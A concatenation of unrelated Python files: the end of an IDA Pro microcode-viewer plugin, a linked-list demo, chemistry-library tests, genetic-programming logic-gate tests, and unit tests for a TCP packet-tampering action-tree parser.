if event.type() != QtCore.QEvent.Polish:
return False
for action in self.qmenu.actions():
if action.text() in ["&Font...", "&Synchronize with"]: # lol..
qmenu.removeAction(action)
self.qmenu.removeEventFilter(self)
self.qmenu = None
return True
p_qmenu = ctypes.cast(int(popup_handle), ctypes.POINTER(ctypes.c_void_p))[0]
qmenu = sip.wrapinstance(int(p_qmenu), QtWidgets.QMenu)
self.filter = FilterMenu(qmenu)
qmenu.installEventFilter(self.filter)
# only handle right clicks on lines containing micro instructions
ins_token = self.model.mtext.get_ins_for_line(self.model.current_line)
if not ins_token:
return False
class MyHandler(ida_kernwin.action_handler_t):
def activate(self, ctx):
controller.show_subtree(ins_token)
def update(self, ctx):
return ida_kernwin.AST_ENABLE_ALWAYS
# inject the 'View subtree' action into the right click context menu
desc = ida_kernwin.action_desc_t(None, 'View subtree', MyHandler())
ida_kernwin.attach_dynamic_action_to_popup(form, popup_handle, desc, None)
return True
#-----------------------------------------------------------------------------
# Util
#-----------------------------------------------------------------------------
class ViewCursor(object):
"""
TODO
"""
def __init__(self, line_num, x, y, mapped=True):
self.line_num = line_num
self.x = x
self.y = y
self.mapped = mapped
@property
def text_position(self):
return (self.line_num, self.x)
@property
def viewport_position(self):
return (self.line_num, self.x, self.y)
|
39379
|
class Node:
def __init__(self, value, next):
self.value = value
self.next = next
class LinkedList:
def __init__(self):
self.head = None
def add(self, value):
self.head = Node(value, self.head)
def remove(self):
to_remove = self.head
self.head = self.head.next
to_remove.next = None
def reverse(self):
head = current = self.head
prev = next = None
while current:
next = current.next
current.next = prev
prev = current
current = next
self.head = prev
self.print()
def print(self):
current = self.head
while current:
print(current.value, end=" ")
print("->", end = " ")
if not current.next:
print(current.next, end ="\n")
current = current.next
if __name__ == "__main__":
ll = LinkedList()
for i in range(10, 1, -1):
ll.add(i)
ll.print()
ll.reverse()
|
39400
|
import pytest
from rdkit import Chem
from aizynthfinder.chem import MoleculeException, Molecule
def test_no_input():
with pytest.raises(MoleculeException):
Molecule()
def test_create_with_mol():
rd_mol = Chem.MolFromSmiles("O")
mol = Molecule(rd_mol=rd_mol)
assert mol.smiles == "O"
def test_create_with_smiles():
mol = Molecule(smiles="O")
assert Chem.MolToSmiles(mol.rd_mol) == "O"
def test_inchi():
mol = Molecule(smiles="O")
assert mol.inchi == "InChI=1S/H2O/h1H2"
def test_inchi_key():
mol = Molecule(smiles="O")
assert mol.inchi_key == "<KEY>"
def test_fingerprint():
mol = Molecule(smiles="O")
assert sum(mol.fingerprint(2)) == 1
assert sum(mol.fingerprint(2, 10)) == 1
def test_sanitize():
mol = Molecule(smiles="O", sanitize=True)
assert Chem.MolToSmiles(mol.rd_mol) == "O"
mol = Molecule(smiles="c1ccccc1(C)(C)")
with pytest.raises(MoleculeException):
mol.sanitize()
mol.sanitize(raise_exception=False)
assert mol.smiles == "CC1(C)CCCCC1"
def test_equality():
mol1 = Molecule(smiles="CCCCO")
mol2 = Molecule(smiles="OCCCC")
assert mol1 == mol2
def test_basic_equality():
mol1 = Molecule(smiles="CC[C@@H](C)O") # R-2-butanol
mol2 = Molecule(smiles="CC[C@H](C)O") # S-2-butanol
assert mol1 != mol2
assert mol1.basic_compare(mol2)
def test_has_atom_mapping():
mol1 = Molecule(smiles="CCCCO")
mol2 = Molecule(smiles="C[C:5]CCO")
assert not mol1.has_atom_mapping()
assert mol2.has_atom_mapping()
def test_remove_atom_mapping():
mol = Molecule(smiles="C[C:5]CCO")
assert mol.has_atom_mapping()
mol.remove_atom_mapping()
assert not mol.has_atom_mapping()
|
39425
|
import unittest
import datetime
import genetic
import random
class Node:
Value = None
Left = None
Right = None
def __init__(self, value, left=None, right=None):
self.Value = value
self.Left = left
self.Right = right
def isFunction(self):
return self.Left is not None
def __str__(self):
result = self.Value
if self.isFunction():
result += "([" + str(self.Left) + "]"
if self.Right is not None:
result += ",[" + str(self.Right) + "]"
result += ")"
return result + " "
class Operation:
Func = None
HasLeft = None
HasRight = None
def __init__(self, func, hasLeft, hasRight):
self.Func = func
self.HasLeft = hasLeft
self.HasRight = hasRight
def getUsedIndexes(candidate):
used = {0: [0]}
if candidate[0].isFunction():
for i in reversed(range(len(candidate))):
element = candidate[i]
iUsed = [i]
if element.isFunction():
leftIndex = element.Left
rightIndex = element.Right
if i < leftIndex < len(candidate):
iUsed.extend(used[leftIndex])
if rightIndex is not None:
if i < rightIndex < len(candidate):
iUsed.extend(used[rightIndex])
used[i] = iUsed
return set(used[0])
def getFitness(candidate, geneset, rules):
usedIndexes = getUsedIndexes(candidate)
localCopy = candidate[:]
notUsed = list(set(range(len(candidate))) - usedIndexes)
for i in notUsed:
localCopy[i] = None
fitness = 0
for rule in rules:
if getFitnessForRule(localCopy, rule[0], rule[1], geneset) == rule[2]:
fitness += 1
if fitness == len(rules):
fitness = 1000 - len(usedIndexes)
return fitness
def getFitnessForRule(candidate, a, b, geneset):
if candidate[0].isFunction():
localCopy = candidate[:]
for i in reversed(range(len(localCopy))):
element = localCopy[i]
if element is None:
continue
if element.isFunction():
leftIndex = element.Left
rightIndex = element.Right
left = None
if i < leftIndex < len(localCopy):
left = localCopy[leftIndex].Value
right = None
if rightIndex is not None:
if i < rightIndex < len(localCopy):
right = localCopy[rightIndex].Value
value = element.Value
if isinstance(element.Value, str):
gene = geneset[element.Value]
value = gene.Func(left if left is not None else 0,
right if right is not None else 0)
localCopy[i] = Node(value)
else:
localCopy[i] = Node(geneset[element.Value].Func(a, b))
result = localCopy[0].Value
else:
result = geneset[candidate[0].Value].Func(a, b)
return result
def displayDot(candidate, startTime):
result = createDot(candidate.Genes)
timeDiff = datetime.datetime.now() - startTime
print("%s\nfitness: %i\t%s\t%s" % (";".join(result), candidate.Fitness, str(timeDiff), candidate.Strategy))
def createDot(genes):
dotCommands = []
added = [False for i in range(0, len(genes))]
stack = [0]
haveZeroNode = False
while len(stack) > 0:
index = stack.pop()
if added[index]:
continue
added[index] = True
element = genes[index]
if not element.isFunction():
dotCommands.append(str(index) + " [label=\"" + str(element.Value) + "\"]")
else:
dotCommands.append(str(index) + " [label=\"" + element.Value + "\"]")
leftIndex = element.Left
if index < leftIndex < len(genes):
stack.append(leftIndex)
dotCommands.append(str(leftIndex) + " -> " + str(index))
else:
if not haveZeroNode:
dotCommands.append("zero [label=\"0\"]")
haveZeroNode = True
dotCommands.append("zero -> " + str(index))
rightIndex = element.Right
if rightIndex is not None:
if index < rightIndex < len(genes):
stack.append(rightIndex)
dotCommands.append(str(rightIndex) + " -> " + str(index))
else:
if not haveZeroNode:
dotCommands.append("zero [label=\"0\"]")
haveZeroNode = True
dotCommands.append("zero -> " + str(index))
return dotCommands
def displayRaw(candidate, startTime):
timeDiff = datetime.datetime.now() - startTime
print("%s\t%i\t%s" %
((' '.join(map(str, [str(item) for item in candidate.Genes]))),
candidate.Fitness,
str(timeDiff)))
def mutate(childGenes, fnCreateGene):
childIndexesUsed = list(getUsedIndexes(childGenes))
index = childIndexesUsed[random.randint(0, len(childIndexesUsed) - 1)]
childGenes[index] = fnCreateGene(index, len(childGenes))
def crossover(child, parent):
usedParentIndexes = list(sorted(getUsedIndexes(parent)))
usedChildIndexes = list(getUsedIndexes(child))
if len(usedParentIndexes) == 1 and len(usedChildIndexes) == 1:
# node 0 has no child nodes, just copy it
child[0] = parent[0]
return
while True:
parentIndex = usedParentIndexes[random.randint(0, len(usedParentIndexes) - 1)]
childIndex = usedChildIndexes[random.randint(0, len(usedChildIndexes) - 1)]
if parentIndex != 0 or childIndex != 0:
# don't copy the root to the root
break
unusedChildIndexes = list(sorted(set(range(childIndex, len(child))) - set(usedChildIndexes)))
unusedChildIndexes.insert(0, childIndex)
mappedIndexes = {}
nextIndex = 0
for pIndex in usedParentIndexes:
if pIndex < parentIndex:
continue
if len(unusedChildIndexes) > nextIndex:
mappedIndexes[pIndex] = unusedChildIndexes[nextIndex]
else:
mappedIndexes[pIndex] = len(child) + nextIndex - len(unusedChildIndexes)
nextIndex += 1
for parentIndex in mappedIndexes.keys():
node = parent[parentIndex]
childIndex = mappedIndexes[parentIndex]
childNode = Node(node.Value, node.Left, node.Right)
if childIndex < len(child):
child[childIndex] = childNode
else:
child.append(childNode)
left = node.Left
if left is not None:
childNode.Left = mappedIndexes[left] if left in mappedIndexes else 0
right = node.Right
if right is not None:
childNode.Right = mappedIndexes[right] if right in mappedIndexes else 0
def createGene(index, length, geneset):
keys = list(geneset.keys())
key = keys[random.randint(0, len(keys) - 1)]
op = geneset[key]
left = random.randint(index, length - 1) if op.HasLeft else None
right = random.randint(index, length - 1) if op.HasRight else None
return Node(key, left, right)
class OperationGenerationTests(unittest.TestCase):
geneset = None
@classmethod
def setUpClass(cls):
cls.geneset = {'A': Operation(lambda a, b: a, False, False),
'B': Operation(lambda a, b: b, False, False),
'AND': Operation(lambda a, b: a & b, True, True),
'NOT': Operation(lambda a, b: a == 0, True, False)}
def test_generate_OR(self):
minNodes = 6 # not( and( not(a), not(b)))
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 1]]
maxNodes = 20
optimalValue = 1000 - minNodes
startTime = datetime.datetime.now()
fnDisplay = lambda candidate: displayDot(candidate, startTime)
fnGetFitness = lambda candidate: getFitness(candidate, self.geneset, rules)
fnCreateGene = lambda index, length: createGene(index, length, self.geneset)
fnMutate = lambda child: mutate(child, fnCreateGene)
best = genetic.getBest(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene=fnCreateGene,
maxLen=maxNodes, customMutate=fnMutate, customCrossover=crossover)
self.assertTrue(best.Fitness >= optimalValue)
def test_generate_XOR(self):
minNodes = 9 # and( not( and(a, b)), not( and( not(a), not(b))))
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 0]]
maxNodes = 50
optimalValue = 1000 - minNodes
startTime = datetime.datetime.now()
fnDisplay = lambda candidate: displayDot(candidate, startTime)
fnGetFitness = lambda candidate: getFitness(candidate, self.geneset, rules)
fnCreateGene = lambda index, length: createGene(index, length, self.geneset)
fnMutate = lambda child: mutate(child, fnCreateGene)
best = genetic.getBest(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene=fnCreateGene,
maxLen=maxNodes, customMutate=fnMutate, customCrossover=crossover)
self.assertTrue(best.Fitness >= optimalValue)
def test_generate_XOR_with_addition(self):
minNodes = 5 # and( 1, +(a, b))
geneset = {'A': Operation(lambda a, b: a, False, False),
'B': Operation(lambda a, b: b, False, False),
'AND': Operation(lambda a, b: a & b, True, True),
'NOT': Operation(lambda a, b: a == 0, True, False),
'+': Operation(lambda a, b: a + b, True, True),
'1': Operation(lambda a, b: 1, False, False)}
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 0]]
maxNodes = 50
optimalValue = 1000 - minNodes
startTime = datetime.datetime.now()
fnDisplay = lambda candidate: displayDot(candidate, startTime)
fnGetFitness = lambda candidate: getFitness(candidate, geneset, rules)
fnCreateGene = lambda index, length: createGene(index, length, geneset)
fnMutate = lambda child: mutate(child, fnCreateGene)
best = genetic.getBest(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene=fnCreateGene,
maxLen=maxNodes, customMutate=fnMutate, customCrossover=crossover)
self.assertTrue(best.Fitness >= optimalValue)
def test_getFitness_given_base_node_is_A_and_1_matching_rule_should_return_1(self):
rules = [[0, 0, 0], [0, 1, 1]]
genes = [Node('A')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1)
def test_getFitness_given_base_node_is_B_and_1st_2_rules_match_should_return_2(self):
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1]]
genes = [Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 2)
def test_getFitness_given_base_node_is_NOT_with_Left_node_out_of_bounds_and_1st_rule_matches_should_return_1(self):
rules = [[1, 1, 1], [0, 0, 0]]
genes = [Node('NOT', 100, 0)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1)
def test_getFitness_given_base_node_is_NOT_with_Left_node_A_and_2nd_rule_matches_should_return_1(self):
rules = [[0, 0, 0], [1, 1, 1]]
genes = [Node('NOT', 100, 0)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1)
def test_getFitness_given_base_node_is_AND_with_both_nodes_out_of_bounds_and_0_matching_rules_should_return_0(self):
rules = [[1, 0, 1]]
genes = [Node('AND', 100, 100)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 0)
def test_getFitness_given_all_rules_pass_and_1_gene_should_return_1000_minus_1(self):
rules = [[0, 0, 0]]
genes = [Node('AND', 100, 100)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - len(genes))
def test_getFitness_given_all_rules_pass_and_2_genes_but_only_1_used_should_return_1000_minus_1(self):
rules = [[0, 0, 0]]
genes = [Node('AND', 100, 100), Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 1)
def test_getFitness_given_all_rules_pass_and_3_genes_but_only_2_used_should_return_1000_minus_2(self):
rules = [[0, 0, 0]]
genes = [Node('AND', 2, 100), Node('AND', 2, 2), Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 2)
def test_getFitness_given_all_rules_pass_with_NOT_2_NOT_1_NOT_2_B_A_should_return_1000_minus_2(self):
rules = [[0, 0, 0]]
genes = [Node('NOT', 2), Node('NOT', 1), Node('NOT', 2), Node('B'), Node('A')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 2)
def test_getFitness_given_rules_and_genes_for_XOR_should_get_1000_minus_9(self):
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 0]]
# and( not( and(a, b)), not( and( not(a), not(b))))
genes = [Node('AND', 1, 2), Node('NOT', 3), Node('NOT', 4), Node('AND', 5, 6), Node('AND', 7, 8),
Node('NOT', 7), Node('NOT', 8), Node('A'), Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 9)
if __name__ == '__main__':
unittest.main()
|
39444
|
import logging
import os
from scapy.all import IP, TCP
import actions.tree
import actions.drop
import actions.tamper
import actions.duplicate
import actions.utils
import layers.packet
def test_init():
"""
Tests initialization
"""
print(actions.action.Action.get_actions("out"))
def test_count_leaves():
"""
Tests leaf count is correct.
"""
a = actions.tree.ActionTree("out")
logger = logging.getLogger("test")
assert not a.parse("TCP:reserved:0tamper{TCP:flags:replace:S}-|", logger), "Tree parsed malformed DNA"
a.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger)
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
assert a.count_leaves() == 1
assert a.remove_one()
a.add_action(duplicate)
assert a.count_leaves() == 1
duplicate.left = duplicate2
assert a.count_leaves() == 1
duplicate.right = drop
assert a.count_leaves() == 2
def test_check():
"""
Tests action tree check function.
"""
a = actions.tree.ActionTree("out")
logger = logging.getLogger("test")
a.parse("[TCP:flags:RA]-tamper{TCP:flags:replace:S}-|", logger)
p = layers.packet.Packet(IP()/TCP(flags="A"))
assert not a.check(p, logger)
p = layers.packet.Packet(IP(ttl=64)/TCP(flags="RA"))
assert a.check(p, logger)
assert a.remove_one()
assert a.check(p, logger)
a.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger)
assert a.check(p, logger)
a.parse("[IP:ttl:64]-tamper{TCP:flags:replace:S}-|", logger)
assert a.check(p, logger)
p = layers.packet.Packet(IP(ttl=15)/TCP(flags="RA"))
assert not a.check(p, logger)
def test_scapy():
"""
Tests misc. scapy aspects relevant to strategies.
"""
a = actions.tree.ActionTree("out")
logger = logging.getLogger("test")
a.parse("[TCP:reserved:0]-tamper{TCP:flags:replace:S}-|", logger)
p = layers.packet.Packet(IP()/TCP(flags="A"))
assert a.check(p, logger)
packets = a.run(p, logger)
assert packets[0][TCP].flags == "S"
p = layers.packet.Packet(IP()/TCP(flags="A"))
assert a.check(p, logger)
a.parse("[TCP:reserved:0]-tamper{TCP:chksum:corrupt}-|", logger)
packets = a.run(p, logger)
assert packets[0][TCP].chksum
assert a.check(p, logger)
def test_str():
"""
Tests string representation.
"""
logger = logging.getLogger("test")
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
assert str(a).strip() == "[%s]-|" % str(t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
assert a.add_action(tamper)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}-|"
# Tree will not add a duplicate action
assert not a.add_action(tamper)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}-|"
assert a.add_action(tamper2)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R},)-|"
assert a.add_action(actions.duplicate.DuplicateAction())
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate,),)-|"
drop = actions.drop.DropAction()
assert a.add_action(drop)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate(drop,),),)-|" or \
str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate(,drop),),)-|"
assert a.remove_action(drop)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate,),)-|"
# Cannot remove action that is not present
assert not a.remove_action(drop)
assert str(a).strip() == "[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(duplicate,),)-|"
a = actions.tree.ActionTree("out", trigger=t)
orig = "[TCP:urgptr:15963]-duplicate(,drop)-|"
a.parse(orig, logger)
assert a.remove_one()
assert orig != str(a)
assert str(a) in ["[TCP:urgptr:15963]-drop-|", "[TCP:urgptr:15963]-duplicate-|"]
def test_pretty_print_send():
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
duplicate = actions.duplicate.DuplicateAction()
a.add_action(duplicate)
correct_string = "TCP:flags:0\nduplicate\n├── ===> \n└── ===> "
assert a.pretty_print() == correct_string
def test_pretty_print(logger):
"""
Print complex tree, although difficult to test
"""
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
duplicate3 = actions.duplicate.DuplicateAction()
duplicate4 = actions.duplicate.DuplicateAction()
duplicate5 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
drop2 = actions.drop.DropAction()
drop3 = actions.drop.DropAction()
drop4 = actions.drop.DropAction()
duplicate.left = duplicate2
duplicate.right = duplicate3
duplicate2.left = tamper
duplicate2.right = drop
duplicate3.left = duplicate4
duplicate3.right = drop2
duplicate4.left = duplicate5
duplicate4.right = drop3
duplicate5.left = drop4
duplicate5.right = tamper2
a.add_action(duplicate)
correct_string = "TCP:flags:0\nduplicate\n├── duplicate\n│ ├── tamper{TCP:flags:replace:S}\n│ │ └── ===> \n│ └── drop\n└── duplicate\n ├── duplicate\n │ ├── duplicate\n │ │ ├── drop\n │ │ └── tamper{TCP:flags:replace:R}\n │ │ └── ===> \n │ └── drop\n └── drop"
assert a.pretty_print() == correct_string
assert a.pretty_print(visual=True)
assert os.path.exists("tree.png")
os.remove("tree.png")
a.parse("[TCP:flags:0]-|", logger)
a.pretty_print(visual=True) # Empty action tree
assert not os.path.exists("tree.png")
def test_pretty_print_order():
"""
Tests the left/right ordering by reading in a new tree
"""
logger = logging.getLogger("test")
a = actions.tree.ActionTree("out")
assert a.parse("[TCP:flags:A]-duplicate(tamper{TCP:flags:replace:R}(tamper{TCP:chksum:replace:14239},),duplicate(tamper{TCP:flags:replace:S}(tamper{TCP:chksum:replace:14239},),))-|", logger)
correct_pretty_print = "TCP:flags:A\nduplicate\n├── tamper{TCP:flags:replace:R}\n│ └── tamper{TCP:chksum:replace:14239}\n│ └── ===> \n└── duplicate\n ├── tamper{TCP:flags:replace:S}\n │ └── tamper{TCP:chksum:replace:14239}\n │ └── ===> \n └── ===> "
assert a.pretty_print() == correct_pretty_print
def test_parse():
"""
Tests string parsing.
"""
logger = logging.getLogger("test")
t = actions.trigger.Trigger("field", "flags", "TCP")
a = actions.tree.ActionTree("out", trigger=t)
base_t = actions.trigger.Trigger("field", "flags", "TCP")
base_a = actions.tree.ActionTree("out", trigger=base_t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
tamper3 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper4 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
a.parse("[TCP:flags:0]-|", logger)
assert str(a) == str(base_a)
assert len(a) == 0
base_a.add_action(tamper)
assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}-|", logger)
assert str(a) == str(base_a)
assert len(a) == 1
assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R},)-|", logging.getLogger("test"))
base_a.add_action(tamper2)
assert str(a) == str(base_a)
assert len(a) == 2
base_a.add_action(tamper3)
base_a.add_action(tamper4)
assert a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R}(tamper{TCP:flags:replace:S}(tamper{TCP:flags:replace:R},),),)-|", logging.getLogger("test"))
assert str(a) == str(base_a)
assert len(a) == 4
base_t = actions.trigger.Trigger("field", "flags", "TCP")
base_a = actions.tree.ActionTree("out", trigger=base_t)
duplicate = actions.duplicate.DuplicateAction()
assert a.parse("[TCP:flags:0]-duplicate-|", logger)
base_a.add_action(duplicate)
assert str(a) == str(base_a)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
tamper3 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="A")
tamper4 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate.left = tamper
assert a.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},)-|", logger)
assert str(a) == str(base_a)
duplicate.right = tamper2
assert a.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},tamper{TCP:flags:replace:R})-|", logger)
assert str(a) == str(base_a)
tamper2.left = tamper3
assert a.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},tamper{TCP:flags:replace:R}(tamper{TCP:flags:replace:A},))-|", logger)
assert str(a) == str(base_a)
strategy = actions.utils.parse("[TCP:flags:0]-duplicate(tamper{TCP:flags:replace:S},tamper{TCP:flags:replace:R})-| \/", logger)
assert strategy
assert len(strategy.out_actions[0]) == 3
assert len(strategy.in_actions) == 0
assert not a.parse("[]", logger) # No valid trigger
assert not a.parse("[TCP:flags:0]-", logger) # No valid ending "|"
assert not a.parse("[TCP:]-|", logger) # invalid trigger
assert not a.parse("[TCP:flags:0]-foo-|", logger) # Non-existent action
assert not a.parse("[TCP:flags:0]--|", logger) # Empty action
assert not a.parse("[TCP:flags:0]-duplicate(,,,)-|", logger) # Bad tree
assert not a.parse("[TCP:flags:0]-duplicate()))-|", logger) # Bad tree
assert not a.parse("[TCP:flags:0]-duplicate(((()-|", logger) # Bad tree
assert not a.parse("[TCP:flags:0]-duplicate(,))))-|", logger) # Bad tree
assert not a.parse("[TCP:flags:0]-drop(duplicate,)-|", logger) # Terminal action with children
assert not a.parse("[TCP:flags:0]-drop(duplicate,duplicate)-|", logger) # Terminal action with children
assert not a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(,duplicate)-|", logger) # Non-branching action with right child
assert not a.parse("[TCP:flags:0]-tamper{TCP:flags:replace:S}(drop,duplicate)-|", logger) # Non-branching action with children
def test_tree():
"""
Tests basic tree functionality.
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
duplicate = actions.duplicate.DuplicateAction()
a.add_action(None)
a.add_action(tamper)
assert a.get_slots() == 1
a.add_action(tamper2)
assert a.get_slots() == 1
a.add_action(duplicate)
assert a.get_slots() == 2
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
drop = actions.drop.DropAction()
a.add_action(drop)
assert a.get_slots() == 0
add_success = a.add_action(tamper)
assert not add_success
assert a.get_slots() == 0
rep = ""
for s in a.string_repr(a.action_root):
rep += s
assert rep == "drop"
print(str(a))
assert a.parse("[TCP:flags:A]-duplicate(tamper{TCP:seq:corrupt},)-|", logging.getLogger("test"))
for act in a:
print(str(a))
assert len(a) == 2
assert a.get_slots() == 2
for _ in range(100):
assert str(a.get_rand_action("out", request="DropAction")) == "drop"
def test_remove():
"""
Tests remove
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
tamper3 = actions.tamper.TamperAction()
assert not a.remove_action(tamper)
a.add_action(tamper)
assert a.remove_action(tamper)
a.add_action(tamper)
a.add_action(tamper2)
a.add_action(tamper3)
assert a.remove_action(tamper2)
assert tamper2 not in a
assert tamper.left == tamper3
assert not tamper.right
assert len(a) == 2
a = actions.tree.ActionTree("out", trigger=t)
duplicate = actions.duplicate.DuplicateAction()
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
tamper3 = actions.tamper.TamperAction()
a.add_action(tamper)
assert a.action_root == tamper
duplicate.left = tamper2
duplicate.right = tamper3
a.add_action(duplicate)
assert len(a) == 4
assert a.remove_action(duplicate)
assert duplicate not in a
assert tamper.left == tamper2
assert not tamper.right
assert len(a) == 2
a.parse("[TCP:flags:A]-|", logging.getLogger("test"))
assert not a.remove_one(), "Cannot remove one with no action root"
def test_len():
"""
Tests length calculation.
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
assert len(a) == 0, "__len__ returned wrong length"
a.add_action(tamper)
assert len(a) == 1, "__len__ returned wrong length"
a.add_action(tamper)
assert len(a) == 1, "__len__ returned wrong length"
a.add_action(tamper2)
assert len(a) == 2, "__len__ returned wrong length"
duplicate = actions.duplicate.DuplicateAction()
a.add_action(duplicate)
assert len(a) == 3, "__len__ returned wrong length"
def test_contains():
"""
Tests contains method
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction()
tamper2 = actions.tamper.TamperAction()
tamper3 = actions.tamper.TamperAction()
assert not a.contains(tamper), "contains incorrect behavior"
assert not a.contains(tamper2), "contains incorrect behavior"
a.add_action(tamper)
assert a.contains(tamper), "contains incorrect behavior"
assert not a.contains(tamper2), "contains incorrect behavior"
add_success = a.add_action(tamper)
assert not add_success, "added duplicate action"
assert a.contains(tamper), "contains incorrect behavior"
assert not a.contains(tamper2), "contains incorrect behavior"
a.add_action(tamper2)
assert a.contains(tamper), "contains incorrect behavior"
assert a.contains(tamper2), "contains incorrect behavior"
a.remove_action(tamper2)
assert a.contains(tamper), "contains incorrect behavior"
assert not a.contains(tamper2), "contains incorrect behavior"
a.add_action(tamper2)
assert a.contains(tamper), "contains incorrect behavior"
assert a.contains(tamper2), "contains incorrect behavior"
remove_success = a.remove_action(tamper)
assert remove_success
assert not a.contains(tamper), "contains incorrect behavior"
assert a.contains(tamper2), "contains incorrect behavior"
a.add_action(tamper3)
assert a.contains(tamper3), "contains incorrect behavior"
assert len(a) == 2, "len incorrect return"
remove_success = a.remove_action(tamper2)
assert remove_success
def test_iter():
"""
Tests iterator.
"""
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
assert a.add_action(tamper)
assert a.add_action(tamper2)
assert not a.add_action(tamper)
for node in a:
print(node)
def test_run():
"""
Tests running packets through the chain.
"""
logger = logging.getLogger("test")
t = actions.trigger.Trigger(None, None, None)
a = actions.tree.ActionTree("out", trigger=t)
tamper = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="S")
tamper2 = actions.tamper.TamperAction(field="flags", tamper_type="replace", tamper_value="R")
duplicate = actions.duplicate.DuplicateAction()
duplicate2 = actions.duplicate.DuplicateAction()
drop = actions.drop.DropAction()
packet = layers.packet.Packet(IP()/TCP())
a.add_action(tamper)
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 1
assert None not in packets
assert packets[0].get("TCP", "flags") == "S"
a.add_action(tamper2)
print(str(a))
packet = layers.packet.Packet(IP()/TCP())
assert not a.add_action(tamper), "tree added duplicate action"
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 1
assert None not in packets
assert packets[0].get("TCP", "flags") == "R"
print(str(a))
a.remove_action(tamper2)
a.remove_action(tamper)
a.add_action(duplicate)
packet = layers.packet.Packet(IP()/TCP(flags="RA"))
packets = a.run(packet, logging.getLogger("test"))
assert len(packets) == 2
assert None not in packets
assert packets[0][TCP].flags == "RA"
assert packets[1][TCP].flags == "RA"
print(str(a))
